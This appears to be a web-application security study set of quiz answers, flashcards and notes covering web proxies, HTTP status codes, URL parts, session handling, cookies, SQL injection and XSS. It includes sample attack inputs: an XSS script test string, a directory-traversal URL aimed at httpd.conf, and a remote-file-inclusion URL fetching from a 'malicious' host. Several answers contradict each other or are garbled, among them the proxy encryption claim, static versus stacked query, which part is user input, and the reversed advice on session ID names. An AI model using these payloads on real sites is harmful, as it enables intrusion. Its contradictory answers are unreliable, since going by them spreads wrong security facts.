Web Proxy Device Functions & HTTP

Questions and Answers

Which two functions are typically provided by a web proxy device?

• Translating HTTP messages to FTP and SMTP messages
• Enabling HTTP transfers across a firewall (correct)
• Caching of HTTP messages (correct)
• Encrypting HTTP packets transmitted between web clients and web servers
• Scanning a web server for related contents

Match the HTTP status code range to its general description:

• Codes in the 500 range (correct)
• Codes in the 100 range (correct)
• Codes in the 400 range (correct)
• Codes in the 300 range (correct)
• Codes in the 200 range (correct)

Match the parts of the following URL to the description: ftp://xyz-company.com:2457/support/file;id=65?name=intro&r=true

• id=65 (correct)
• xyz-company.com (correct)
• ftp (correct)
• name=intro&r=true (correct)
• support/file (correct)
• 2457 (correct)

Which function is primarily provided by HTTP/2.0 to improve performance compared to HTTP/1.1?

HTTP/2.0 provides HTTP message multiplexing and requires fewer messages to download web content. (C)

Why is it recommended that application developers change the default session ID names used by common web application development frameworks?

These session ID names can be used to fingerprint the application framework employed. (D)

A user is using an online shopping website to order laptop computers. Which mechanism is likely used by the shopping site in order to securely maintain user authentication during shopping?

Session ID (B)

What is the best mitigation approach against session fixation attacks?

Ensure that the session ID is used after a user completes authentication. (E)

Which two attributes can be set in a web application cookie to indicate that it is a persistent cookie?

Expires (A), Max-Age (D)

Which international organization is dedicated to educating industry professionals, creating tools, and evangelizing practices for securing web applications?

Open Web Application Security Project (OWASP) (B)

In the SQL statement SELECT * FROM group WHERE attack = 'network' AND a-type LIKE 'ping%';, which component is most likely to be user input in a web form?

ping (E)

Which statement best describes an example of an out-of-band SQL injection attack?

An attacker launches the attack on a web site and forces the web application to send the query results via an email. (B)

A threat actor launches an SQL injection attack against a website by sending multiple specific statements to the web site and reconstructing the key information the threat actor seeks. What type of SQL injection attack is the threat actor using?

In-band (C)

An attacker launches an SQL injection attack on a web application by trying to force the application to request the back-end database to perform multiple SELECT queries. Which technique exploits the SQL injection vulnerability on the web application?

Union operator (C)

Which type of SQL query is in the following SQL statement? select * from users where user = "admin";

Static query (A)

A company uses Microsoft Active Directory to manage the authentication and authorization of employee workstations. The company hires a cybersecurity professional to perform compliance penetration testing. Which type of penetration testing can be used to verify the Active Directory configuration?

LDAP injection (B)

Flashcards

Web Proxy Functions

A web proxy provides caching of HTTP messages, improving response times and reducing bandwidth usage. Also, It allows HTTP transfers across a firewall, facilitating communication between networks with different security policies.

200 Status Codes

HTTP status codes in the 200 range indicate successful transactions.

300 Status Codes

HTTP status codes in the 300 range relate to HTTP redirections.

400 Status Codes

HTTP status codes in the 400 range are related to client errors.

500 Status Codes

HTTP status codes in the 500 range relate to server errors.

100 Status Codes

HTTP status codes in the 100 range are informational.

Host (URL)

xyz-company.com is the host in the URL.

Port (URL)

2457 is the port in the URL.

Path (URL)

support/file is the path in the URL.

Scheme (URL)

ftp is the scheme in the URL.

Query String (URL)

name=intro&r=true is the query string in the URL.

Path-segment Parameter (URL)

id=65 is path-segment parameter in the URL.

HTTP/2.0 Improvement

HTTP/2.0 improves performance over HTTP/1.1 by providing HTTP message multiplexing, which means it can send multiple requests and responses simultaneously over a single TCP connection, reducing latency and improving resource utilization.

Session ID Naming

Application developers should change session ID names to prevent attackers from fingerprinting the application framework. Common session ID names are well-known and can be exploited.

Session ID Purpose

Using session IDs is the mechanism used by shopping sites to securely maintain user authentication during shopping.

Study Notes

Web Proxy Device Functions

• Caching of HTTP messages reduces bandwidth usage and improves response times.
• Encrypting HTTP packets transmitted between web clients and web servers protects sensitive data.

HTTP Status Codes

• 200 range: related to successful transactions
• 300 range: related to HTTP redirections
• 400 range: related to client errors
• 500 range: related to server errors
• 100 range: informational

URL Elements

• xyz-company.com: host
• 2457: port
• support/file: path
• ftp: scheme
• name=intro&r=true: query-string
• id=65: path-segment-params

Improvement of HTTP 2.0 vs HTTP 1.1

• HTTP 2.0 provides HTTP message multiplexing and requires fewer messages to download web content.
• HTTP 2.0 compresses HTTP messages.

Session ID names

• Application developers should change the session ID names used by common web application development frameworks so that session ID names can be used to fingerprint the application framework employed.

Securely Maintain User Authentication

• A session ID is used by the shopping site to securely maintain user authentication during shopping.

Mitigation Approach Against Session Fixation Attacks

• Ensure that the session ID is used after a user completes authentication.
• Ensure that the session ID is exchanged only though an encrypted channel.

Persistent Cookies

• Expires
• Max-Age

Organization dedicated to securing web applications

• Open Web Application Security Project (OWASP) is dedicated to educating industry professionals, creating tools, and evangelizing best practices for securing web applications and underlying systems.

Web form User Input

• attack is most likely user input on a web form SELECT * FROM group WHERE attack = ‘network' AND a-type LIKE'ping%';

Out-of-band SQL injection

• An attacker launches the attack on a web site and forces the web application to send the query results via an email.

SQL injection

• A threat actor launches an SQL injection attack against a web site by sending multiple specific statements to the web site and reconstructing the key information the threat actor seeks. The threat actor is using in-band.

Exploit the SQL injection

• An attacker launches an SQL injection attack on a web application by trying to force the application requesting the back-end database to perform multiple SELECT queries. The technique that exploits the SQL injection vulnerability on the web application is Union operator.

SQL Query Type

• The SQL query type in the SQL statement select * from users where user = "admin"; is stacked query.

Compliance Penetration Testing

• LDAP injection can be used to verify the proper configuration of the Active Directory service.

Dangerous web session

• Including the session ID in the URL is a potentially dangerous web session management practice.

HTTPOnly flag

• It indicates to the web browser that web client-based code cannot access the cookie.

Mitigate configuration of routers and switches

• Default credential attack is mitigated by configuring newly purchased routers and switches with advanced security measures before deploying them to the production network.

Exploit Vulnerability

• HTTP parameter pollution is the type of vulnerability the attacker tries to exploit. https://portal.a-univ.edu/? search=students&results=50&search=staff

Test String

• To test for cross-site scripting vulnerabilities, the tester will use the string <script>alert("XSS Test Now")</script> in a user input field in a web form.

Prevent XSS attacks

• Use HTTPS only mode for accessing web applications.
• Use HTML escape before inserting untrusted data into HTML element content.
• Use attribute escape before inserting untrusted data into HTML common attributes.
• Use JavaScript escape before inserting untrusted data into JavaScript data values.

Web Vulnerability

• Directory traversal is being exploited by the attacker. http://192.168.46.82:45/vulnerabilities/fi/?page=../../../../../etc/ httpd/httpd.conf

Vulnerability

• Remote file inclusion is the type of vulnerability the attacker tried to exploit. http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/ cookie.html

Insecure Code Compromise

• The use of hard-coded credentials enabled this catastrophic threat.

Mitigate Vulnerabilities

• Use a well-thought-out scheme to provide meaningful error messages to the users but no useful information to an attacker.